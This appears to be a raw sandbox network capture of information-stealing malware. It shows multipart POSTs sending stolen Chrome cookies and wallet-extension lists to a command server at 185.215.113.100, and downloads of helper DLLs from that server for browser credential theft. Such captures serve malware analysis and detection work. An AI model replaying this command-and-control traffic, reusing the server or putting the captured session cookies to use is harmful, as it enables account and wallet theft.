                                  Aug 30, 2024 00:48:00.291567087 CEST224INData Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d
                                  Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRl
                                  Aug 30, 2024 00:48:00.291580915 CEST1236INData Raw: 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 35 6f 63 47 31 75 61 6d 5a 6d 59 32 39 6d 61 6d 39 75 59 6d 5a 69 5a 32 46 76 59 33 77 78 66 44 42 38 4d 48 78 48 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57
                                  Data Ascii: bXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB
                                  Aug 30, 2024 00:48:00.291593075 CEST1236INData Raw: 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d
                                  Data Ascii: YW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGl
                                  Aug 30, 2024 00:48:00.292505980 CEST1236INData Raw: 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47
                                  Data Ascii: ZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHx
                                  Aug 30, 2024 00:48:00.292591095 CEST776INData Raw: 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32
                                  Data Ascii: Z2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXB
                                  Aug 30, 2024 00:48:00.293819904 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                                  Host: 185.215.113.100
                                  Content-Length: 268
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
                                  Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"fplugins------DGHJECAFIDAFHJKFCGHI--
                                  Aug 30, 2024 00:48:00.540582895 CEST335INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:00 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 108
                                  Keep-Alive: timeout=5, max=96
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                  Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                  Aug 30, 2024 00:48:00.558813095 CEST203OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECA
                                  Host: 185.215.113.100
                                  Content-Length: 6535
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:00.558847904 CEST6535OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66
                                  Data Ascii: ------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                  Aug 30, 2024 00:48:01.526921034 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:00 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=95
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:01.811342955 CEST94OUTGET /0d60be0de163924d/sqlite3.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:02.060964108 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:01 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                  ETag: "10e436-5e7ec6832a180"
                                  Accept-Ranges: bytes
                                  Content-Length: 1106998
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                  Aug 30, 2024 00:48:02.061115026 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                  Data Ascii: #N@B/81s:<R@B/92P @B
                                  Aug 30, 2024 00:48:03.936532974 CEST953OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG
                                  Host: 185.215.113.100
                                  Content-Length: 751
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                  Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------HIEBAKEHDHCAKEBFBKEG--
                                  Aug 30, 2024 00:48:04.968646049 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:04 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=93
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:05.056303978 CEST565OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF
                                  Host: 185.215.113.100
                                  Content-Length: 363
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                  Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
                                  Aug 30, 2024 00:48:05.877644062 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:05 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=92
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:06.576720953 CEST565OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGC
                                  Host: 185.215.113.100
                                  Content-Length: 363
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                  Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
                                  Aug 30, 2024 00:48:07.360200882 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:06 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=91
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:07.727479935 CEST94OUTGET /0d60be0de163924d/freebl3.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:08.157994032 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:08 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "a7550-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 685392
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                  Aug 30, 2024 00:48:09.150937080 CEST94OUTGET /0d60be0de163924d/mozglue.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:09.396548986 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:09 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "94750-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 608080
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                  Aug 30, 2024 00:48:09.791074038 CEST95OUTGET /0d60be0de163924d/msvcp140.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:10.036473036 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:09 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "6dde8-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 450024
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                  Aug 30, 2024 00:48:10.341175079 CEST91OUTGET /0d60be0de163924d/nss3.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:10.755790949 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:10 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "1f3950-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 2046288
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                  Aug 30, 2024 00:48:12.204278946 CEST95OUTGET /0d60be0de163924d/softokn3.dll HTTP/1.1
                                  Host: 185.215.113.100
